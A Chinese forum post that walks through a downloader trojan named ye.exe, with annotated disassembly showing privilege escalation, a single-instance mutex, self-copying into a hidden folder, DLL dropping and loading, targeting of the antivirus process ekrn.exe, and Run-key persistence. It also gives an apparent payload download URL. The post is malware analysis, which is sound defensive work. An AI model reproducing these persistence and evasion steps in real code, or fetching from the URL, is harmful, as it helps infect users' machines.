ye.exe下载者木马分析
2926 点击·0 回帖
灯火互联
楼主
 |  | |
 | 文件名称:9648c7cc2f01d7b67718cb89a48d927e 文件哈希:9648c7cc2f01d7b67718cb89a48d927e 文件大小:31528字节 创建时间:2012-04-13 02:01:37 文件类型:EXE PEID信息:UPX 2.93 (LZMA) [Overlay] * 可能受到威胁的系统: windows 详细分析/功能介绍 1.upx解压缩执行原程序 2.提升进程权限,创建互斥体 3保存自身到文件 4释放dll加载dll,修改注册表使dll自启动 5下载文件 "http://c.shidaihuabian.com/s.gif" >> "%windir%tempolm.ini" 提升进程权限,创建互斥体,跳转到主体部分 部分反汇编代码 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// CODE:00401820 push ebp CODE:00401821 mov ebp, esp CODE:00401823 sub esp, 174h CODE:00401829 push ebx CODE:0040182A push esi CODE:0040182B push 1 CODE:0040182D call _Rtladjustprivilege ; 提升整个进程的权限至14h CODE:00401832 push 104h CODE:00401837 push offset modulepath CODE:0040183C push 0 CODE:0040183E call _getmodulefilename ; 返回当前程序的路径 CODE:00401843 add esp, 10h CODE:00401846 mov al, 's' CODE:00401848 mov [ebp+var_10], al CODE:0040184B mov [ebp+var_42], al CODE:0040184E push offset Name ; "KAIFAONGQUMEIGANDE" CODE:00401853 mov bl, 'e' CODE:00401855 mov al, 'E' CODE:00401857 push 0 ; bInitialOwner CODE:00401859 push 0 ; lpMutexAttributes CODE:0040185B mov [ebp+var_8], 'o' CODE:0040185F mov [ebp+var_7], 'p' CODE:00401863 mov [ebp+var_6], bl ; e CODE:00401866 mov [ebp+var_5], 'n' CODE:0040186A mov [ebp+var_4], 0 CODE:0040186E mov [ebp+var_F], 'c' CODE:00401872 mov [ebp+var_E], '.' CODE:00401876 mov [ebp+var_D], bl ; e CODE:00401879 mov [ebp+var_C], 'x' CODE:0040187D mov [ebp+var_B], bl ; e CODE:00401880 mov [ebp+var_A], 0 CODE:00401884 mov [ebp+var_44], 't' CODE:00401888 mov [ebp+var_43], 'a' CODE:0040188C mov [ebp+var_41], 'k' CODE:00401890 mov [ebp+var_40], 'k' CODE:00401894 mov [ebp+var_3F], 'i' CODE:00401898 mov [ebp+var_3E], 'l' CODE:0040189C mov [ebp+var_3D], 'l' CODE:004018A0 mov [ebp+var_3C], '.' CODE:004018A4 mov [ebp+var_3B], bl ; e CODE:004018A7 mov [ebp+var_3A], 78h CODE:004018AB mov [ebp+var_39], bl ; e CODE:004018AE mov [ebp+var_38], 0 CODE:004018B2 mov [ebp+var_28], bl ; e CODE:004018B5 mov [ebp+var_27], 'k' CODE:004018B9 mov [ebp+var_26], 'r' CODE:004018BD mov [ebp+var_25], 'n' CODE:004018C1 mov [ebp+var_24], '.' CODE:004018C5 mov [ebp+var_23], al ; E CODE:004018C8 mov [ebp+var_22], 'X' CODE:004018CC mov [ebp+var_21], al ; E CODE:004018CF mov [ebp+var_20], 0 CODE:004018D3 call CreateMutexA ; 创建互斥体 CODE:004018D9 mov esi, eax CODE:004018DB nop CODE:004018DC nop CODE:004018DD nop CODE:004018DE nop CODE:004018DF nop CODE:004018E0 call GetLastError CODE:004018E6 cmp eax, 0B7h CODE:004018EB jnz short @mainpart ; 如果互斥体不存在那么说明没有同样的进程正在运行跳转运行程序 CODE:004018ED push esi CODE:004018EE call _closehandle CODE:004018F3 add esp, 4 CODE:004018F6 nop CODE:004018F7 nop CODE:004018F8 nop CODE:004018F9 nop CODE:004018FA push 0 ; uType CODE:004018FC push offset Caption ; "0" CODE:00401901 push offset Caption ; "0" CODE:00401906 push 0FFFFFFFFh ; hWnd CODE:00401908 call MessageBoxA CODE:0040190E push 0 ; uExitCode CODE:00401910 call ExitProcess CODE:00401916 ; --------------------------------------------------------------------------- 劫持ekrn.exe 释放c:/programfile/common file//rgdltecq//nhoifz.pif跳转到释放dll的部分 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// CODE:004019BB call sub_4028D0 ; 获取ekrn.exe ID CODE:004019C0 add esp, 4 CODE:004019C3 cmp eax, 1 CODE:004019C6 jbe short loc_401A2A ; 如果没有开启ekrn.exe跳转 开启先进行处理 CODE:004019C8 push 0 CODE:004019CA lea ecx, [ebp+var_50] CODE:004019CD push 0 CODE:004019CF lea edx, [ebp+var_10] CODE:004019D2 push ecx CODE:004019D3 lea eax, [ebp+var_8] CODE:004019D6 push edx CODE:004019D7 push eax CODE:004019D8 push 0 CODE:004019DA call sub_4027A0 CODE:004019DF push 1F4h CODE:004019E4 call _Sleep CODE:004019E9 push 0 CODE:004019EB lea ecx, [ebp+var_60] CODE:004019EE push 0 CODE:004019F0 lea edx, [ebp+var_44] CODE:004019F3 push ecx CODE:004019F4 lea eax, [ebp+var_8] CODE:004019F7 push edx CODE:004019F8 push eax CODE:004019F9 push 0 CODE:004019FB call sub_4027A0 CODE:00401A00 push 1F4h CODE:00401A05 call _Sleep CODE:00401A0A nop CODE:00401A0B nop CODE:00401A0C nop CODE:00401A0D nop CODE:00401A0E nop CODE:00401A0F nop CODE:00401A10 push 0 CODE:00401A12 lea ecx, [ebp+var_70] CODE:00401A15 push 0 CODE:00401A17 lea edx, [ebp+var_44] CODE:00401A1A push ecx CODE:00401A1B lea eax, [ebp+var_8] CODE:00401A1E push edx CODE:00401A1F push eax CODE:00401A20 push 0 CODE:00401A22 call sub_4027A0 CODE:00401A27 add esp, 50h CODE:00401A2A CODE:00401A2A loc_401A2A: ; CODE XREF: start+1A6j CODE:00401A2A push edi CODE:00401A2B mov ecx, 40h CODE:00401A30 xor eax, eax CODE:00401A32 lea edi, [ebp+var_173] CODE:00401A38 mov [ebp+floderpath], 0 CODE:00401A3F push 1 ; 如果不存在创建 CODE:00401A41 rep stosd CODE:00401A43 stosw CODE:00401A45 lea ecx, [ebp+floderpath] CODE:00401A4B push 2Bh ; c:/programfile/common file CODE:00401A4D push ecx CODE:00401A4E push 0 CODE:00401A50 stosb ; 43字节全为0 CODE:00401A51 call _SHGetSpecialFloderPath ; 获取上面的路径 如果文件不存在创建新的 CODE:00401A56 mov esi, lstrcat CODE:00401A5C add esp, 10h CODE:00401A5F lea edx, [ebp+floderpath] CODE:00401A65 mov [ebp+Caption], 'r' CODE:00401A69 push offset asc_41D8C8 ; "\" CODE:00401A6E push edx CODE:00401A6F mov [ebp+var_1B], 'g' CODE:00401A73 mov [ebp+var_1A], 'd' CODE:00401A77 mov [ebp+var_19], 'l' CODE:00401A7B mov [ebp+var_18], 't' CODE:00401A7F mov [ebp+var_17], bl ; e CODE:00401A82 mov [ebp+var_16], 'c' CODE:00401A86 mov [ebp+var_15], 'q' CODE:00401A8A mov [ebp+var_14], 0 CODE:00401A8E call esi ; lstrcat CODE:00401A90 lea eax, [ebp+Caption] CODE:00401A93 lea ecx, [ebp+floderpath] CODE:00401A99 push eax CODE:00401A9A push ecx CODE:00401A9B call esi ; lstrcat CODE:00401A9D lea edx, [ebp+Caption] CODE:00401AA0 push 0 ; uType CODE:00401AA2 lea eax, [ebp+floderpath] CODE:00401AA8 push edx ; lpCaption rgdltecq CODE:00401AA9 push eax ; lpText c:/programfile/common file//rgdltecq CODE:00401AAA push 0FFFFFFFFh ; hWnd CODE:00401AAC call MessageBoxA CODE:00401AB2 lea ecx, [ebp+floderpath] CODE:00401AB8 push 0 CODE:00401ABA push ecx CODE:00401ABB call _CreateDirectory ; 创建文件夹c:/programfile/common file//rgdltecq CODE:00401AC0 add esp, 8 CODE:00401AC3 lea edx, [ebp+floderpath] CODE:00401AC9 mov [ebp+var_34], 'n' CODE:00401ACD mov [ebp+var_33], 'h' CODE:00401AD1 push offset asc_41D8C8 ; "\" CODE:00401AD6 push edx CODE:00401AD7 mov [ebp+var_32], 'o' CODE:00401ADB mov [ebp+var_31], 'i' CODE:00401ADF mov [ebp+var_30], 'f' CODE:00401AE3 mov [ebp+var_2F], 'z' CODE:00401AE7 mov [ebp+var_2E], '.' CODE:00401AEB mov [ebp+var_2D], 'p' CODE:00401AEF mov [ebp+var_2C], 'i' CODE:00401AF3 mov [ebp+var_2B], 'f' CODE:00401AF7 mov [ebp+var_2A], 0 CODE:00401AFB call esi ; lstrcat CODE:00401AFD lea eax, [ebp+var_34] CODE:00401B00 lea ecx, [ebp+floderpath] CODE:00401B06 push eax CODE:00401B07 push ecx CODE:00401B08 call esi ; lstrcat CODE:00401B0A lea edx, [ebp+floderpath] ; c:/programfile/common file//rgdltecq//nhoifz.pif CODE:00401B10 push 0 CODE:00401B12 push edx CODE:00401B13 push offset modulepath CODE:00401B18 call _copyfilename ; 把当前文件复制到上面的路径 CODE:00401B1D push 0FA0h CODE:00401B22 call _Sleep CODE:00401B27 add esp, 10h CODE:00401B2A call loc_4015B0 CODE:00401B2F pop edi CODE:00401B30 pop esi CODE:00401B31 mov eax, 1 CODE:00401B36 pop ebx CODE:00401B37 mov esp, ebp CODE:00401B39 pop ebp CODE:00401B3A retn CODE:00401B3A start endp CODE:00401B3A CODE:00401B3A ; --------------------------------------------------------------------------- 释放dll,加载dll修改注册表开机自动加载dll。分析这一部分花费了好长时间的dll部分等下次吧 ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// CODE:004015B0 loc_4015B0: ; CODE XREF: start+30Ap CODE:004015B0 push ebp CODE:004015B1 mov ebp, esp CODE:004015B3 sub esp, 1E0h CODE:004015B9 push ebx CODE:004015BA push esi CODE:004015BB push edi CODE:004015BC nop CODE:004015BD nop CODE:004015BE nop CODE:004015BF nop CODE:004015C0 jb short loc_4015C5 CODE:004015C2 jnb short loc_4015C5 CODE:004015C2 ; --------------------------------------------------------------------------- CODE:004015C4 db 0E8h ; ? CODE:004015C5 ; --------------------------------------------------------------------------- CODE:004015C5 CODE:004015C5 loc_4015C5: ; CODE XREF: CODE:004015C0j CODE:004015C5 ; CODE:004015C2j CODE:004015C5 mov ecx, 40h CODE:004015CA xor eax, eax CODE:004015CC lea edi, [ebp-14Bh] CODE:004015D2 mov byte ptr [ebp-14Ch], 0 CODE:004015D9 rep stosd CODE:004015DB stosw CODE:004015DD stosb ; 从-14Bh开始43h个字节置0 CODE:004015DE lea eax, [ebp-14Ch] CODE:004015E4 push 104h CODE:004015E9 push eax CODE:004015EA call _getsystemdirectory ; 获取系统目录 CODE:004015EF xor ecx, ecx CODE:004015F1 add esp, 8 CODE:004015F4 mov [ebp-47h], ecx CODE:004015F7 mov byte ptr [ebp-48h], 0 CODE:004015FB mov [ebp-43h], cx CODE:004015FF mov [ebp-41h], cl CODE:00401602 call GetTickCount CODE:00401608 push eax CODE:00401609 lea edx, [ebp-48h] CODE:0040160C push offset aD_dll ; "\%d.DLL" CODE:00401611 push edx CODE:00401612 call wsprintfA ; systemruntime.dll CODE:00401618 lea edi, [ebp-48h] CODE:0040161B or ecx, 0FFFFFFFFh CODE:0040161E xor eax, eax CODE:00401620 add esp, 0Ch CODE:00401623 repne scasb CODE:00401625 not ecx CODE:00401627 sub edi, ecx CODE:00401629 lea edx, [ebp-14Ch] CODE:0040162F mov esi, edi CODE:00401631 mov ebx, ecx CODE:00401633 mov edi, edx CODE:00401635 or ecx, 0FFFFFFFFh CODE:00401638 repne scasb CODE:0040163A mov ecx, ebx CODE:0040163C dec edi CODE:0040163D shr ecx, 2 CODE:00401640 rep movsd CODE:00401642 push eax CODE:00401643 mov ecx, ebx CODE:00401645 lea eax, [ebp-14Ch] ; %system%systemruntime.dll CODE:0040164B and ecx, 3 CODE:0040164E push eax CODE:0040164F push offset a1 ; "1" CODE:00401654 rep movsb CODE:00401656 push 0FFFFFFFFh CODE:00401658 call MessageBoxA CODE:0040165E lea ecx, [ebp-14Ch] CODE:00401664 push ecx CODE:00401665 call @releaseDLL CODE:0040166A add esp, 4 CODE:0040166D test al, al CODE:0040166F jz loc_401803 ; dll释放失败 跳转结束 CODE:00401675 push 1388h CODE:0040167A call _Sleep CODE:0040167F add esp, 4 CODE:00401682 lea edx, [ebp-14Ch] CODE:00401688 push edx CODE:00401689 call LoadLibraryA ; 加载刚写的dll CODE:0040168F mov esi, eax CODE:00401691 test esi, esi CODE:00401693 jz loc_401803 CODE:00401699 mov edi, GetProcaddress CODE:0040169F lea eax, [ebp-8] CODE:004016A2 mov bl, 'r' CODE:004016A4 push eax CODE:004016A5 push esi CODE:004016A6 mov byte ptr [ebp-8], 'W' CODE:004016AA mov byte ptr [ebp-7], 'h' CODE:004016AE mov byte ptr [ebp-6], 'a' CODE:004016B2 mov byte ptr [ebp-5], 'i' CODE:004016B6 mov byte ptr [ebp-4], 'e' CODE:004016BA mov [ebp-3], bl CODE:004016BD mov byte ptr [ebp-2], 0 CODE:004016C1 call edi ; GetProcAddress ; whaier CODE:004016C3 push 0 CODE:004016C5 call eax ; 加载被释放的dll的whaier函数 CODE:004016C7 push 1388h CODE:004016CC call _Sleep CODE:004016D1 add esp, 8 CODE:004016D4 lea ecx, [ebp-10h] CODE:004016D7 mov byte ptr [ebp-10h], 'S' CODE:004016DB mov byte ptr [ebp-0Fh], 'i' CODE:004016DF push ecx CODE:004016E0 push esi CODE:004016E1 mov byte ptr [ebp-0Eh], 'm' CODE:004016E5 mov byte ptr [ebp-0Dh], 'e' CODE:004016E9 mov byte ptr [ebp-0Ch], 'n' CODE:004016ED mov byte ptr [ebp-0Bh], 'z' CODE:004016F1 mov byte ptr [ebp-0Ah], 'e' CODE:004016F5 mov byte ptr [ebp-9], 0 CODE:004016F9 call edi ; GetProcAddress ; simenze CODE:004016FB push 0 CODE:004016FD call eax CODE:004016FF add esp, 4 CODE:00401702 lea edx, [ebp-1E0h] CODE:00401708 mov dword ptr [ebp-1E0h], 94h CODE:00401712 push edx CODE:00401713 call GetVersionExA CODE:00401719 cmp dword ptr [ebp-1DCh], 6 CODE:00401720 jnb short loc_401736 ; windows版本在98以上 CODE:00401722 lea eax, [ebp-14Ch] CODE:00401728 push eax CODE:00401729 call @change_reg2 CODE:0040172E add esp, 4 CODE:00401731 jmp loc_401803 CODE:00401736 ; --------------------------------------------------------------------------- CODE:00401736 CODE:00401736 loc_401736: ; CODE XREF: CODE:00401720j CODE:00401736 call @change_reg ; 更改 注册表提升权限是病毒更安全 CODE:0040173B mov cl, '' CODE:0040173D push offset modulepath CODE:00401742 mov [ebp-38h], cl CODE:00401745 mov [ebp-2Eh], cl CODE:00401748 mov [ebp-26h], cl CODE:0040174B mov [ebp-17h], cl CODE:0040174E lea ecx, [ebp-40h] CODE:00401751 push offset a360se ; "360se" CODE:00401756 mov al, 'o' CODE:00401758 mov dl, 's' CODE:0040175A push ecx CODE:0040175B push 80000002h CODE:00401760 mov byte ptr [ebp-40h], 'S' CODE:00401764 mov [ebp-3Fh], al ; o CODE:00401767 mov byte ptr [ebp-3Eh], 'f' CODE:0040176B mov byte ptr [ebp-3Dh], 't' CODE:0040176F mov byte ptr [ebp-3Ch], 'w' CODE:00401773 mov byte ptr [ebp-3Bh], 'a' CODE:00401777 mov [ebp-3Ah], bl ; r CODE:0040177A mov byte ptr [ebp-39h], 'e' CODE:0040177E mov byte ptr [ebp-37h], 'M' CODE:00401782 mov byte ptr [ebp-36h], 'i' CODE:00401786 mov byte ptr [ebp-35h], 'c' CODE:0040178A mov [ebp-34h], bl ; r CODE:0040178D mov [ebp-33h], al ; o CODE:00401790 mov [ebp-32h], dl ; s CODE:00401793 mov [ebp-31h], al ; o CODE:00401796 mov byte ptr [ebp-30h], 'f' CODE:0040179A mov byte ptr [ebp-2Fh], 't' CODE:0040179E mov byte ptr [ebp-2Dh], 'W' CODE:004017A2 mov byte ptr [ebp-2Ch], 'i' CODE:004017A6 mov byte ptr [ebp-2Bh], 'n' CODE:004017AA mov byte ptr [ebp-2Ah], 'd' CODE:004017AE mov [ebp-29h], al ; o CODE:004017B1 mov byte ptr [ebp-28h], 'w' CODE:004017B5 mov [ebp-27h], dl ; s CODE:004017B8 mov byte ptr [ebp-25h], 'C' CODE:004017BC mov byte ptr [ebp-24h], 'u' CODE:004017C0 mov [ebp-23h], bl ; r CODE:004017C3 mov [ebp-22h], bl ; r CODE:004017C6 mov byte ptr [ebp-21h], 'e' CODE:004017CA mov byte ptr [ebp-20h], 'n' CODE:004017CE mov byte ptr [ebp-1Fh], 't' CODE:004017D2 mov byte ptr [ebp-1Eh], 'V' CODE:004017D6 mov byte ptr [ebp-1Dh], 'e' CODE:004017DA mov [ebp-1Ch], bl CODE:004017DD mov [ebp-1Bh], dl CODE:004017E0 mov byte ptr [ebp-1Ah], 'i' CODE:004017E4 mov [ebp-19h], al CODE:004017E7 mov byte ptr [ebp-18h], 'n' CODE:004017EB mov byte ptr [ebp-16h], 'R' CODE:004017EF mov byte ptr [ebp-15h], 'u' CODE:004017F3 mov byte ptr [ebp-14h], 'n' CODE:004017F7 mov byte ptr [ebp-13h], 0 CODE:004017FB call loc_4014B0 CODE:00401800 add esp, 10h CODE:00401803 CODE:00401803 loc_401803: ; CODE XREF: CODE:0040166Fj CODE:00401803 ; CODE:00401693j ... CODE:00401803 push 2710h CODE:00401808 call Sleep CODE:0040180E pop edi CODE:0040180F pop esi CODE:00401810 mov eax, 1 CODE:00401815 pop ebx CODE:00401816 mov esp, ebp CODE:00401818 pop ebp CODE:00401819 retn CODE:00401819 ; --------------------------------------------------------------------------- CODE:0040181A align 10h CODE:00401820 作者 麦小扣 | |
 |  |